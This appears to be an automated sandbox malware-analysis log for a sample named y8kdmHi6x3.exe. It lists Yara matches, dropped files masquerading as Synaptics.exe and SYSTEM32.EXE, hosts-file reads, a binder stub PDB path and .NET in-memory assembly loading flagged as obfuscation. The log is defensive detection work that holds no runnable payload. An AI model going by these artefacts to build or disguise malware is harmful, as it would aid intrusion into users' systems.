            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.379982346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430371740.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.378011350.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.404954241.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.314658286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.396965179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.389965974.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.386302469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.390367257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.399973811.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.313768043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441048593.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.381765881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.388606290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.312421482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429244511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.384393929.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526573354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.383936753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417274835.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.382689406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.403730358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.381548795.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.408854727.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.400267484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.313014699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.382444300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316511430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: y8kdmHi6x3.exe, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: Synaptics.exe.4.dr, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.2.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.13.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.25.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.0.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.15.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.5.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.1.unpack, Loader/Nyan.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Users\user\Desktop\SYSTEM32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: y8kdmHi6x3.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: y8kdmHi6x3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: y8kdmHi6x3.exeStatic file information: File size 2083328 > 1048576
            Source: y8kdmHi6x3.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1c8600
            Source: y8kdmHi6x3.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: y8kdmHi6x3.exe, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: Synaptics.exe.4.dr, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.2.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.13.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.25.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.0.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.15.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.5.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.1.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.3.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.20.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.9.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.11.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.y8kdmHi6x3.exe.bc0000.4.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.7.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: SYSTEM32.EXE.6.dr, mFomRpTnURes/BEzzbvoTDpsx.cs.Net Code: ZfRHHqObaOVxIv System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, mFomRpTnURes/BEzzbvoTDpsx.cs.Net Code: ZfRHHqObaOVxIv System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, mFomRpTnURes/BEzzbvoTDpsx.cs.Net Code: ZfRHHqObaOVxIv System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.0.Synaptics.exe.bc0000.0.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.2.Synaptics.exe.bc0000.0.unpack, Loader/Nyan.cs.Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 0_2_00FCF9C4 push 8402A7CFh; iretd 0_2_00FCF9C9
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 0_2_00FCFB60 pushfd ; iretd 0_2_00FCFB61
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00446564 push 004465F1h; ret 4_2_004465E9
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00406B3C push 00406B8Dh; ret 4_2_00406B85
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00478CB0 push 00478D2Dh; ret 4_2_00478D25
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00422044 push ecx; mov dword ptr [esp], edx4_2_00422049
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042E010 push 0042E03Ch; ret 4_2_0042E034
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0046C0B0 push ecx; mov dword ptr [esp], eax4_2_0046C0B2
